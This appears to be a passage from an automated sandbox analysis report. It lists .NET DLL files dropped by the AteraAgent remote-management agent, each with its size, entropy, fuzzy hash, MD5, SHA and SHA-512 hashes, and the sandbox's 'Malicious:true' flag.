                                                                                                                                                                                                                                                                                                                                  SHA-512:AD57432D81C9D646562ABCD43582DD854C2C3C440B6A656EF2270A4B611C25DC7DAFEED476574CCEA4BAA34A25180AF8874B39E6B69F5AABDCF0BCA7BC5449FB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.846471332267952
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:iT+6ywnVvW0LW5SNyb8E9VF6IYijSJIVxcwe3:i998yEpYi60O3
                                                                                                                                                                                                                                                                                                                                  MD5:690EB76BAF338A2C39E259A111A40CD4
                                                                                                                                                                                                                                                                                                                                  SHA1:27906FDE17F50D650A5143AC123E84E3C6470666
                                                                                                                                                                                                                                                                                                                                  SHA-256:E70712A2789185C97D469003B70FD63CF6A47BC47C1B80C054303A758003C339
                                                                                                                                                                                                                                                                                                                                  SHA-512:89E778EFE4A089DE2E5DFF17E1B922AD85F7DD38A30F9CCCD18B36C7E63CC44C835AE30BF9B551ACA77D9267B69AE08C185FFC4B9BA7595CDA2866340405B3BE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.849609316466306
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8RbzriaXT+WlEWe5Nyb8E9VF6IYijSJIVxri+teSzc:q7icodEpYi60u8VY
                                                                                                                                                                                                                                                                                                                                  MD5:A95B0C2809EE9145B95F6654095FB0ED
                                                                                                                                                                                                                                                                                                                                  SHA1:8DD2564123D2B26D4A078D2CA1B6EDC441058260
                                                                                                                                                                                                                                                                                                                                  SHA-256:87D1A7ECF54DD82F7DA55441D1E89081A1D3772815DE2029ADED8F6B098B87E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:F40D018D6D41B703E4D99D5CE00246C9DC3AF61CA4D7707FC0DB4EED4E6E92A2F01D26526F04ABD428D9425D0751C15ABFC305728C7943217B735FC46CC3571F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):148520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417399057226757
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:2dYO+3m9R6e1x03BZ6bDSzZ8B0uAP+CSS:k+2jv1x0ebezWiuK
                                                                                                                                                                                                                                                                                                                                  MD5:02E51F92069C5FF7977BB4E3C6C7A4DA
                                                                                                                                                                                                                                                                                                                                  SHA1:71E61FE264D50551561066ED3AAD20F5D45CAFF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BCDAEC0B5E76819483857CD888B24F1D524AF1DB77A2E89DA8B9F037091735EC
                                                                                                                                                                                                                                                                                                                                  SHA-512:BCA5BCC36107ACB354938CA15D641C11CEA9F38BFEF83CAD6C8272D5FE625DA25ECB5EE63175EE89E0D9A65B983D9B3AFBDC1327FEDF6B7303E18213DD8FFCA2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.809517252069014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:lzNnzx7FWjYW5mPVNyby2sE9jBF6IYiYF85S35IVnxGUHF8oymi9uJjxq:JRtRWjYWw9Nyb8E9VF6IYijSJIVxI6s
                                                                                                                                                                                                                                                                                                                                  MD5:97A9F3C2360358BE3349E16097E9D73A
                                                                                                                                                                                                                                                                                                                                  SHA1:606C65058A2C633CE83D2EC9511EE5A9002B91C4
                                                                                                                                                                                                                                                                                                                                  SHA-256:16D0F9CA09C1C3BC5EEAC2214C9BACCF1ECCE14231F871C78D4780FFD4018FDD
                                                                                                                                                                                                                                                                                                                                  SHA-512:4BDF1AFB3E2B1EEA7FFD60AB3DA8B7DC750B816527C61E02DAB5E56E07F801D5ED201C4D1BB0FE9DE2BED2ED347BC9A7A9683EE259A2037AD9951BB6E89D94E6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8940313952760395
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:neWnoW7zNyb8E9VF6IYijSJIVxG1+MLJL:nnJvEpYi601M9L
                                                                                                                                                                                                                                                                                                                                  MD5:C72D7E80756E60B68B442E6C94702CDD
                                                                                                                                                                                                                                                                                                                                  SHA1:749714C526EF436C07FC357EED862A8C535357AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:5635955945C1B62469FAE0140F1CE88C952EC553695C660CCCCB3E2BD5AA9E23
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7DECBEE5B80B2C8C2EFAE5A1E5022F28607A7E843D76E353FFCC9BD0A296E237C9CECB0D9202426947926E57A478401F208AAF5F5EC453CF19653A03100B95E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):99368
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.235971873079877
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:qeDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbaD763Yy:7itRK/XIgIZAXjD96WfLtGdM5baDk
                                                                                                                                                                                                                                                                                                                                  MD5:B42E45D54E35FCAABF9187D8A90E7172
                                                                                                                                                                                                                                                                                                                                  SHA1:B8FC2BAF89BCE708ABBAE8920BD2FF789BDC368A
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CC8FBB54B42D5A2F1FB762F3FC0E32087F966060873B12C66DDFFA6D63253E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:9BAC56E4E78911DD7A1F432E2C51F69C4B695F85DD2D37BC23A1F8E01CCF5512DA279FF3E0416D79CC7BAF3AEA89FB73A8C9F845E0DAC0E8C2B26BBDC93DB863
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853895198870055
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:HxGxIZWJjW5bPfNyby2sE9jBF6IYiYF85S35IVnxGUHFykNf8:H6oWJjWN3Nyb8E9VF6IYijSJIVxukh8
                                                                                                                                                                                                                                                                                                                                  MD5:FC2C441DB82E5F382DB12287A394885A
                                                                                                                                                                                                                                                                                                                                  SHA1:CC86E97F08DE132B787E67234970CDD7FDA3FB74
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FA81C76B10779294E2413F62C0C516E318134A4E7B2B9BB28CB99606EE6B588
                                                                                                                                                                                                                                                                                                                                  SHA-512:5EAB8B7CB05A25A516581B9AA54C1B4E04C161E8ADB7AE2344A758BDC78326DF29F353603B9131514090E1F7FF0651516DD4435A2B6CAC522866DA2B542FE596
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.775604484973059
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qqk53/hW3fZ+zWqyNyb8E9VF6IYijSJIVxjOY:qqk53MmSEpYi60n
                                                                                                                                                                                                                                                                                                                                  MD5:73E774B09489021BB1F6812915C392AA
                                                                                                                                                                                                                                                                                                                                  SHA1:2EE185AF44F271ED4441D96FBA63A927BDFCBF17
                                                                                                                                                                                                                                                                                                                                  SHA-256:539869DEF1EFDAF2C752CB67BCBB8E6D2F20AB429FCBBC9107427CEDD666D04A
                                                                                                                                                                                                                                                                                                                                  SHA-512:3B56CDF4760C99617EC3139D1226C659DD3E22E5830BF8976D2FD7FA13A23D5B939FCB6D36975196FCD2222B43557DC67119FCB543BD54B2FD38E012B3CC063F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.658253651586789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8FCc4Y4OJWfOWqWWOW7yNyb8E9VF6IYijSJIVxwOCDQ:4CcyCrSEpYi60IQ
                                                                                                                                                                                                                                                                                                                                  MD5:045AD5D35B4E4D5FE7EE07336209A7D7
                                                                                                                                                                                                                                                                                                                                  SHA1:1733F1D1599FBECD38736F4CF7FC3A27655E7F2C
                                                                                                                                                                                                                                                                                                                                  SHA-256:F504090CD44CB0CC85CFA9D02DC9BA4F13190EE33F0F2180BBAE6AC3A31E511B
                                                                                                                                                                                                                                                                                                                                  SHA-512:3620F49E2576C8D4A28782B382126505D60BFB6239FE4700078A0F44B6DA10E941FECB373B258037FB8B386024D939618DA04BA3DACA5834DED77D27992B20AA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.876180794069439
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ylTx93aWxMW5XPqNyby2sE9jBF6IYiYF85S35IVnxGUHFwPtr0ZO2/:SAWxMWxiNyb8E9VF6IYijSJIVxMPtrC5
                                                                                                                                                                                                                                                                                                                                  MD5:A4B4CB5A8BB4B700A238E3D582BA55B6
                                                                                                                                                                                                                                                                                                                                  SHA1:D97C15B988D14185661194330332096E9DBB2CC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:64E70764C3347FB573B3611B9DFC69F9E9A9F74B6BC3CBB74FAE2DEC8BF91CDF
                                                                                                                                                                                                                                                                                                                                  SHA-512:BA5E0B568269277EE586B27094B54D597F7EB158452F8FD61C4B3E97ED9FDFC6BA528AA626D123AC4A6D1DEBCE624AC56B04835EB134494E250A8FD1C500E0A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.855207593147035
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:eYqArxbYWHaW5oPINyby2sE9jBF6IYiYF85S35IVnxGUHF2zfxGofDt:cAlcWHaWOQNyb8E9VF6IYijSJIVxyogt
                                                                                                                                                                                                                                                                                                                                  MD5:7AA08D1FC9FD614EBABD1587BACD0208
                                                                                                                                                                                                                                                                                                                                  SHA1:E2ED755FBC318FFC1EA8DA09CAC9A6C59E294E40
                                                                                                                                                                                                                                                                                                                                  SHA-256:D561C27FA407F7FB8881D1B22FF3A5DFE73C5702967717B8CE0BC3F84CC4DEE7
                                                                                                                                                                                                                                                                                                                                  SHA-512:E4D89FFB5AB2DA94942E05029E88D388C69B2D52726144CF9DFAA50D54707B2E33031DBBADB7061455B8967BB4E7A2361C1802C791D014FBE2D2C78E1F398C3B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.777959105060507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:3eIZnWlNWTaNyb8E9VF6IYijSJIVxpcst9hDY1:uUyo6EpYi60PrD8
                                                                                                                                                                                                                                                                                                                                  MD5:F673C2CD1065975DCE840DD1BD53FCA6
                                                                                                                                                                                                                                                                                                                                  SHA1:374B2384F27D30160A163E874830BB14B6E95E2D
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD02CB7D6FFD969646B39CB03BC88885783266599B2158071EAC13CFFBFDF045
                                                                                                                                                                                                                                                                                                                                  SHA-512:29B761E29AD6F80D1466737D63799911D03F92F723DC84BF50945B3175B3C5854D8DB89B0B1DA99B53992B0E56EDFEE88F1859F8F0379CF1F8943A0FC0C69B13
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.494434134843218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:HlQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdWZ+Nyb8E9VF6h:FQq33333333kX+TBi8OGEpYi60/Q
                                                                                                                                                                                                                                                                                                                                  MD5:BADD2DC95335FC22E375925801945DCC
                                                                                                                                                                                                                                                                                                                                  SHA1:93E921C60B409CCB3819DA77A3F40DC8CDC3A24A
                                                                                                                                                                                                                                                                                                                                  SHA-256:257628371D79C0735D14CE3DCD6692D1619AAF9E81F0F67A00914F41402906BC
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF7A6B781D351987AAAAAF3FB03BFB86BAC0A370E74F945A695F6307FF0A239B62B41FAECDBAFFB5737CE19D79EB02C39D46DB2DBC1A4F2497C504678E8BA5CD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.849353511209045
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:O28YFlXulWY/WGONyb8E9VF6IYijSJIVxKD9pMXL:O0qX2EpYi60xXL
                                                                                                                                                                                                                                                                                                                                  MD5:B1326E728AF4088C34C39F12FB6AD062
                                                                                                                                                                                                                                                                                                                                  SHA1:598F602AA4DA01504B10491077D7FAE1E9C00E93
                                                                                                                                                                                                                                                                                                                                  SHA-256:712BE0B967BDAFF22BB6AF5711E4F5709909817C7A0B8DDBA7C49EE2CFD7F08A
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C790E8C762CA45D79E1A7F3F93A94D4F0EE2F6C96D647E4A8A493A18C180B07FAD5C3ADF5832964B43237D57069706868326572146F7FA3AD7AC41A425D92C6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.725896949380314
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RuMLcdQ5MW9MWYONyb8E9VF6IYijSJIVx3il19Q:4OcSpS2EpYi60219Q
                                                                                                                                                                                                                                                                                                                                  MD5:395811AF675274B00FA5418C8F89BE06
                                                                                                                                                                                                                                                                                                                                  SHA1:AEC3B97F7A8ADA1843689386CFDB04D211657E9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:752D0B50F6FE140BAAF6099DDB1CC00CE384811B0E16A3BBC525392DF1D81833
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5F0A5AF70FD3AB57A7793725B4EB70ED4C0D89AD69D5233FC99FEB47A7D340286444871B181EF5677F7E9A7BF774A8EE8F61D71E0CD5F39605B35E85F5E53DB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.815124993644386
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:bZ7RqXWDRqlRqj0RqFWqENyb8E9VF6IYijSJIVxVa3f:t9qKqjqjuq5kEpYi60o
                                                                                                                                                                                                                                                                                                                                  MD5:685D2B6A982A10A7DE938DB20DF0D082
                                                                                                                                                                                                                                                                                                                                  SHA1:93FDAE4494901FF03DFB229F631FEB54CFA8337A
                                                                                                                                                                                                                                                                                                                                  SHA-256:915E28324C1F2F66A9A35DDA9AD763F82A3D1CC41C1BE5CC932DE23DB46AAEFB
                                                                                                                                                                                                                                                                                                                                  SHA-512:33EDFB53DC053AC7BE4F194FAABEBEA5C223E64D5038C7B3D5CACF7664F3F8E99EAF6759C28BC62E18572FC7F1A82ECF681C787551749CA321D3229EFDB18DD8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.628643370626439
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ANBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9W7eNyb8E9VF6IYijSJIVx3bxe:AvMhF2SzNzwu/NljuQmEpYi60de
                                                                                                                                                                                                                                                                                                                                  MD5:4BFBAE0B0B30D1D206487A654EE40F7A
                                                                                                                                                                                                                                                                                                                                  SHA1:19082DAFE5D2A6241E44CADC76686F546122BDF6
                                                                                                                                                                                                                                                                                                                                  SHA-256:EAC4C1055EC1D52665ACC8B507E58BCEE27BCE5D53E202FAD02D7799C1AD7BE2
                                                                                                                                                                                                                                                                                                                                  SHA-512:3663D9EA1751D3A0352F64B082D24EF43A03461842B87EFE1B546BBB010AD1148511B25D172AA685D44CB24AA7D8AAA5A12469FA88333E6E6D68EF31359449DA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.899492352944838
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:HZ4RLWdRfRJ0RZWDeNyb8E9VF6IYijSJIVxly3C:HZK0pJuImEpYi60oy
                                                                                                                                                                                                                                                                                                                                  MD5:7A40DD8480E76E77F921F63B79BE1F53
                                                                                                                                                                                                                                                                                                                                  SHA1:0D665F969FA8D61C2572596CE34FA563BF119ABD
                                                                                                                                                                                                                                                                                                                                  SHA-256:56EA652505E6E897E8CB7B48C11CFB5C47ADD5A7A1D459C5417FBAC78B20C9D9
                                                                                                                                                                                                                                                                                                                                  SHA-512:CCF14F3A258E48F20A2B996C82E702008843BBB03D510C7BB2AAAC16DC1FA5BF2B8503C7B8DE3A663AFC6903CD088B63EDDD6F939F84819A9A91E07CA6AC8B31
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.793571590954247
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:CFx+WTIEfW5uP6Nyby2sE9jBF6IYiYF85S35IVnxGUHFz9ZIQM/:CYWsmWIyNyb8E9VF6IYijSJIVx39mj/
                                                                                                                                                                                                                                                                                                                                  MD5:D5419A6B93944DC72B02FA5411FC2046
                                                                                                                                                                                                                                                                                                                                  SHA1:13A46E0328E26524F4B51D94D6CF26948D2474E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB11643AE808409700FE9969EE6710F4495814A8C345147FC04B3F6C6D6E6849
                                                                                                                                                                                                                                                                                                                                  SHA-512:7692851BBDEE348F0D67AF286FAB919EAED887C937336A77DB1A8B99AF5C469F2234FE3E900D8DFF80C71056BDE4CEAE6CB1AD6DDCAA6A5143E9AA75C8C00947
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):105000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.381779174920515
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Xvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXBA76P:fgk1tiLMYiDFvxqrWDWNoJXBAs
                                                                                                                                                                                                                                                                                                                                  MD5:274A29FFB64260F07AFE5D99C5155585
                                                                                                                                                                                                                                                                                                                                  SHA1:4AFBCAD6451EDA1048C3BA20E6FFC9E90BBE00C3
                                                                                                                                                                                                                                                                                                                                  SHA-256:82B2665B895F45D0C9B3B96AE08E14764DB8297FB2A8D5B70598C19A39F74BC6
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD60D9E29E0B493B45564773D56A1848E7BBEC458A9EA2B79C9DAB7B88FF4524C0F3DC1BC0E8A15F27AC9EDFB9491E2950733941D79AD2B20B858B88D6EFF1A8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853320168044028
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qKcuz1W1cWliNyb8E9VF6IYijSJIVxLn8RE:2u8niEpYi60bP
                                                                                                                                                                                                                                                                                                                                  MD5:B9FDE21F01A11F1B8C2FCDB8BC7B59B1
                                                                                                                                                                                                                                                                                                                                  SHA1:C3C0F84B82098D0FED4ECCE3F91654F9F985166F
                                                                                                                                                                                                                                                                                                                                  SHA-256:B2AFFA1A4212CFBD6612D310079FE241EF082D4386744F45978C959C02C4C63A
                                                                                                                                                                                                                                                                                                                                  SHA-512:3A5B7B8FC209FE490971B6A91FFC1D0F67ACFF8E76E8723236885B0E606C4F80317DF85D39492AF2669042243295A220BD34C8C995F3DF00A1146B9F9D6EFD8B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
